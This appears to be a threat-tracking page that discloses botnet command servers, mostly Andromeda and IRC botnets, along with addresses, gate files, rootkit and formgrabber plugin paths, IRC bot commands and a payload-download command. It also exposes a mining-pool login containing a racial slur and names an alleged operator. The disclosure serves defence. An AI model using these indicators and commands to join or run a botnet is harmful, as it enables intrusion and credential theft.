This server is owned by serbian skid Root Map: irc.MiloDjukanovic.net (9) Numeric ID: i dont have the executable to find channels so feel free to post them here if u find them server:boat.trixi-diablolik.com port:6667 PASS 0 NICK [A|W_XP|x32|1]gjywth USER 14628 8 * :41909 Local users: Current Local Users: 9 Max: 1017Global users: Current Global Users:Read more...
freshairhosting.nl (Andromeda http botnet hosted by Thailand Bangkok Metrabyte Th)
Resolved freshairhosting.nl to 119.59.99.200 When will these skids finally get tired of andromeda? Server: freshairhosting.nl Gate file: image.php Hosting infos: http://whois.domaintools.com/119.59.99.200
213.165.89.117 (irc botnet hosted by Germany Karlsruhe 1&1 Internet Ag)
Server: 213.165.89.117 Port: 5050 Channel: #kos Nick format: [USA|XP]hjktjel This is snk’s asper mod again. Hosting infos: http://whois.domaintools.com/213.165.89.117
37.221.163.175 (Andromeda http botnet hosted by Romania Voxility S.r.l.)
The laziest skids don’t even bother getting a domain at all. Why hello Nicolas Moses. What do you have for us today? It’s andromeda again, this time hosted on a windows vps. Server: 37.221.163.175 Gate file: /andro/image.php EDIT: Oh hey, bitcoin mining. Glad to see you’re still keeping the same old password. daily500:nigger123456@pool.bitclockers.com:8332 Also aRead more...
uberchat.no-ip.biz (Andromeda http botnet hosted by Romania Voxility S.r.l.)
Resolved uberchat.no-ip.biz to 37.221.160.124 Yet another cracked andromeda. Skids don’t even bother to get a real domain for it. Server: uberchat.no-ip.biz Gate file: /chat/image.php Clicking on adf.ly links, someone’s clearly trying to make some big bucks. public void adfly() { this.WebBrowser1.Navigate("http://adf.ly/FHZcZ"); } Hosting infos: http://whois.domaintools.com/37.221.160.124
keep.hustling4life.biz (Bitcoin mining pool for botnet)
Resolved keep.hustling4life.biz to 195.190.13.138, 46.17.92.158, 213.165.85.165 Someone is trying to get some mining done before the mining reward drops I guess. The file is from an already posted botnet. * Topic for #mr is: !dl hxxp://213.165.85.165:8081/udhsdfka.png * Topic for #mr set by test at Mon Nov 26 04:52:40 2012 Server: keep.hustling4life.biz Port: 2142 Mining information:Read more...
46.166.139.177 (Andromeda http botnet hosted by Italy Florence Santrex Internet Services Ltd.)
Server: 46.166.139.177 Gate file: /Panel/image.php Plugins Rootkit: 46.166.139.177/Panel/r.pack Formgrabber: 46.166.139.177/Panel/f.pack Gate file: fg.php Hosting infos: http://whois.domaintools.com/46.166.139.177
suckmadick.in (irc botnet hosted by Germany Karlsruhe 1&1 Internet Ag)
Resolved suckmadick.in to 87.106.30.17 Server: suckmadick.in Port: 5050 Channel: #m Topic for #m is: .j #send .j #st .d /100/97/111/124/49/59/47/48/60/38/37/19/33/49/51/32/60/49/41/62/101/119/56/105/103/109/ Topic for #m set by x at Sat Nov 24 10:21:05 2012 Channel: #send Topic for #send is: .s.on /100/97/111/124/49/59/47/127/124/127/58/64/127/122/102/114/119/114/112/112/114/116/101/34/124/103/104/10/115/103/52/117/91/109/ /100/97/111/124/49/59/47/127/124/127/58/64/127/122/102/114/119/114/112/112/114/116/101/34/124/103/104/10/ 204 f9555c Topic for #send set by x at Sat Nov 24 13:15:33Read more...
z.7z.lt (Andromeda http malware hosted by United States Fremont Hurricane Electric Inc.)
Resolved z.7z.lt to 216.66.72.159 Server: z.7z.lt Gate file: /ad/image.php Plugins (currently 404): Formgrabber crap.leet.la/ad/f.task Rootkit: crap.leet.la/ad/r.task Socks: crap.leet.la/ad/s.task Hosting infos: http://whois.domaintools.com/216.66.72.159
mal-labs.asia (Andromeda http botnet hosted by United States Denver Fdcservers.net)
Resolved mal-labs.asia to 37.221.170.238 Server: mal-labs.asia Gate file: image.php Plugins: Rootkit mal-labs.asia/plugins/r.pack Formgrabber mal-labs.asia/plugins/f.pack Gate file: fg.php This is the file Paradoxun was running on his bots (cachke.exe). Hosting infos: http://whois.domaintools.com/37.221.170.238